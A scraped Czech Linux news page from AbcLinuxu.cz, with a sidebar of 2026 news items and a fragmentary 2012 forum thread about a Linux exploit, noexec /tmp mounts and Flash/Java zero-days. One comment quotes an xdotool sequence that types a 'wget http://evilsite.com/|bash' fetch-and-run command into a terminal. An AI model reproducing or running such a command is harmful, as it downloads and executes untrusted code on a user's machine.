Byly publikovány informace (technické detaily) o bezpečnostním problému Snapu. Jedná se o CVE-2026-3888. Neprivilegovaný lokální uživatel může s využitím snap-confine a systemd-tmpfiles získat práva roota.
Nightingale je open-source karaoke aplikace, která z jakékoliv písničky lokálního alba (včetně videí) dokáže oddělit vokály, získat text a vše přehrát se synchronizací na úrovni jednotlivých slov a hodnocením intonace. Pro separaci vokálů využívá UVR Karaoke model s Demucs od Mety, texty písní stahuje z lrclib.net (LRCLIB), případně extrahuje pomocí whisperX, který rovněž využívá k načasování slov. V případě audiosouborů aplikace na
… více »Po půl roce vývoje od vydání verze 49 bylo vydáno GNOME 50 s kódovým názvem Tokyo (Mastodon). Podrobný přehled novinek i s náhledy v poznámkách k vydání a v novinkách pro vývojáře.
Článek na stránkách Fedora Magazinu informuje o vydání Fedora Asahi Remixu 43, tj. linuxové distribuce pro Apple Silicon vycházející z Fedora Linuxu 43.
Byl zveřejněn program konference Installfest 2026. Konference proběhne o víkendu 28. a 29. března v Praze na Karlově náměstí 13. Vstup zdarma.
Byla vydána Java 26 / JDK 26. Nových vlastností (JEP - JDK Enhancement Proposal) je 10. Odstraněno bylo Applet API.
Byla vydána nová verze 260 správce systému a služeb systemd (Wikipedie, GitHub). Odstraněna byla podpora skriptů System V. Aktualizovány byly závislosti. Minimální verze Linuxu z 5.4 na 5.10, OpenSSL z 1.1.0 na 3.0.0, Pythonu z 3.7.0 na 3.9.0…
Byla vydána nová verze 5.1 svobodného 3D softwaru Blender. Přehled novinek i s náhledy a videi v poznámkách k vydání. Videopředstavení na YouTube.
Bylo oznámeno vydání nové verze 8.1 "Hoare" kolekce svobodného softwaru umožňujícího nahrávání, konverzi a streamovaní digitálního zvuku a obrazu FFmpeg (Wikipedie). Doprovodný příspěvek na blogu Khronosu rozebírá kódování a dekódování videa pomocí Vulkan Compute Shaders v FFmpeg.
Byl představen open-source a open-hardware prototyp nízkonákladového raketometu kategorie MANPADS, který byl sestaven z běžně dostupné elektroniky a komponent vytištěných na 3D tiskárně. Raketa využívá skládací stabilizační křidélka a canardovou stabilizaci aktivně řízenou palubním letovým počítačem ESP32, vybaveným inerciální měřicí jednotkou MPU6050 (gyroskop a akcelerometr). Přenosné odpalovací zařízení obsahuje GPS,
… více »
13.7.2012 13:24
FrostyX | skóre: 27
| blog: Frostyho_blog
| Olomouc
13.7.2012 13:49
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
13.7.2012 15:27
MaT | skóre: 28
13.7.2012 15:49
Jendа | skóre: 78
| blog: Jenda
| JO70FB
13.7.2012 19:21
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.
13.7.2012 19:36
Jendа | skóre: 78
| blog: Jenda
| JO70FB
14.7.2012 15:35
pavlix | skóre: 54
| blog: pavlix
13.7.2012 16:37
Jendа | skóre: 78
| blog: Jenda
| JO70FB
mrkva@destiny:~$ cd /tmp mrkva@destiny:/tmp$ su Heslo: root@destiny:/tmp# mkdir noexec root@destiny:/tmp# chmod 777 noexec/ root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec root@destiny:/tmp# exit mrkva@destiny:/tmp$ cd noexec mrkva@destiny:/tmp/noexec$ cp /usr/bin/id . mrkva@destiny:/tmp/noexec$ ./id bash: ./id: Permission denied mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id ./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted
13.7.2012 17:10
Jendа | skóre: 78
| blog: Jenda
| JO70FB
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz.bashrc. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?
14.7.2012 23:12
little.owl | skóre: 22
| blog: Messy_Nest
| Brighton/Praha
Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.Zajimalo by mne, co na to SELinux.
14.7.2012 23:20
Jendа | skóre: 78
| blog: Jenda
| JO70FB
xdotool key Alt-F2 xdotool type xterm [RETURN] xdotool type "wget http://evilsite.com/|bash - ; logout"
I invoke.Tak takhle jsem se dlouho nenasmál
13.7.2012 13:50
FrostyX | skóre: 27
| blog: Frostyho_blog
| Olomouc
13.7.2012 15:50
Jendа | skóre: 78
| blog: Jenda
| JO70FB
13.7.2012 16:08
kyknos | skóre: 18
| blog: Quid novi?
| Ranša Rosa
13.7.2012 16:12
Jendа | skóre: 78
| blog: Jenda
| JO70FB
13.7.2012 16:25
kyknos | skóre: 18
| blog: Quid novi?
| Ranša Rosa
13.7.2012 16:31
D.A.Tiger | skóre: 8
| Brno
13.7.2012 16:38
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?
Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.
13.7.2012 16:52
kyknos | skóre: 18
| blog: Quid novi?
| Ranša Rosa
13.7.2012 20:49
murzim | skóre: 12
| blog: murzim
14.7.2012 08:15
vain | skóre: 16
14.7.2012 11:02
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Flash? Java?Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?
14.7.2012 11:18
Jendа | skóre: 78
| blog: Jenda
| JO70FB
14.7.2012 11:41
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Flash? Java? 0day?
Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?
Mohl to být zero day exploit na Flash, Javu nebo na Operu.
14.7.2012 13:36
D.A.Tiger | skóre: 8
| Brno
Tiskni
Sdílej:
